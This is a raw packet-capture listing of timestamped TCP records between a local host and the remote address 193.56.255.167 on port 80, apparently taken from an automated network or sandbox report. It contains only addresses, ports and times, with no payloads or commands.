Dec 16, 2020 11:07:31.655448914 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.655489922 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.655504942 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.655533075 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.655558109 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.655575991 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.655596018 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.655649900 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.655658007 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.655684948 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.655700922 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.655740976 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.655757904 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.655798912 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.655829906 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.655843973 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.655886889 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.655900002 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.655924082 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.655950069 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.655961990 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.655987024 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.656034946 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.656049967 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.656071901 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.656083107 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.656127930 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.656131029 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.656177998 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.656209946 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.656215906 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.656253099 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.656271935 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.656295061 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.656332970 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.656346083 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.656372070 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.656394005 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.656418085 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.656450033 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.656466007 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.656507969 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.656517029 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.656554937 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.656580925 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.656591892 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.656618118 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.656655073 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.656672001 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.656694889 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.656702995 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.656755924 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.656764030 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.656811953 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.656836987 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.656847954 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.656899929 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.656903982 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.656950951 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.656979084 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.657016039 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.657027960 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.657052994 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.657078981 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.657114983 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.657120943 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.657160997 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.657191038 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.657207012 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.657294035 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.815615892 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.815673113 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.815711975 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.815769911 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.815826893 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.815855026 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.815877914 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.815893888 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.815941095 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.815974951 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.816025972 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.816030979 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.816077948 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.816106081 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.816106081 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.816143036 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.816190004 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.816194057 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.816226959 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.816284895 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.816289902 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.816327095 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.816351891 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.816395998 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.816406012 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.816462994 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.816493988 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.816502094 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.816531897 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.816577911 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.816620111 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.816622019 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.816665888 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.816689968 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.816715956 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.816751957 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.816791058 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.816809893 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.816857100 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.816894054 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.816904068 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.816947937 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.817007065 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.817012072 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.817054987 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.817069054 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.817096949 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.817130089 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.817168951 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.817195892 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.817225933 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.817281961 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.817300081 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.817310095 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.817348003 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.817379951 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.817447901 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.817473888 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.817486048 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.817547083 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.817567110 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.817598104 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.817636013 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.817656040 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.817687988 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.817732096 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.817748070 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.817778111 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.817821980 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.817831039 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.817868948 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.817879915 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.817910910 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.817941904 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.817964077 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.818017960 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.818048954 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.818070889 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.818088055 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.818125010 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.818125010 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.818161011 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.818171978 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.818216085 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.818228006 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.818278074 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.818298101 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.818319082 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.818357944 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.818361998 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.818412066 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.818444967 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.818449020 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.818496943 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.818502903 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.818552017 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.818588972 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.818639040 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.818644047 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.818685055 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.818722010 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.818738937 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.818764925 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.818797112 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.818816900 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.818861008 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.818896055 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.818923950 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.818950891 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.818962097 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.819000006 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.819022894 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.819056034 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.819093943 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.819097042 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.819143057 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.819144964 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.819184065 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.819210052 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.819231987 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.819256067 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.819289923 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.819298029 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.819324017 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.819341898 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.819361925 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.819400072 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.819403887 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.819423914 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.819458961 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.819463015 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.819504023 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.819513083 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.819539070 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.819566011 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.819580078 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.819610119 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.819617987 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.819643974 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.819664001 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.819680929 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.819719076 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.819722891 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.819745064 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.819772005 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.819782019 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.819828987 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.819835901 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.819858074 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.819890976 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.819895029 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.819932938 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.819943905 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.819958925 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.819996119 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.819998980 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.820034027 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.820063114 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.820081949 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.820094109 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.820148945 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.820167065 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.820173025 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.820210934 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.820214987 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.820249081 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.820283890 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.820302010 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.820324898 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.820363045 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.820384026 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.820389986 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.820427895 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.820436001 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.820465088 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.820492029 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.820514917 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.820529938 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.820576906 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.820593119 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.820607901 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.820646048 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.979171991 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.979203939 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.979227066 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.979320049 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.979331017 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.979370117 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.979403973 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.979443073 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.979482889 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.979516029 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.979538918 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.979554892 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.979557991 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.979581118 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.979594946 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.979621887 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.979676008 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.979685068 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.979706049 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.979851007 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.979876995 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.979887009 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.979916096 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.980003119 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.980015039 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.980019093 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.980041981 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.980077028 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.980117083 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.980123043 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.980134010 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.980153084 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.980247974 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.980247974 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.980285883 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.980312109 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.980393887 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.980474949 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.980518103 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.980544090 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.980581999 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.980638027 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.980638027 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.980642080 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.980663061 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.980701923 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.980712891 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.980720043 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.980724096 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.980727911 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.980763912 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.980771065 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.980809927 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.980906963 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.980906963 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.980941057 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.980998993 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:32.097875118 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:32.256988049 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:32.257055044 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:32.257087946 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:32.257126093 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:32.257164001 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:32.257190943 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:32.257208109 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:32.257219076 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:32.257263899 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:32.257363081 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:32.872953892 CET	49741	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:32.873621941 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:33.725590944 CET	49742	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:33.725610018 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:33.884061098 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:33.884164095 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:33.884191036 CET	80	49742	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:33.884272099 CET	49742	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:33.885140896 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.043534994 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.076936960 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.076987982 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.077012062 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.077042103 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.077059031 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.077078104 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.077095985 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.077101946 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.077102900 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.077128887 CET	49743	80	192.168.2.5	193.56.255.167
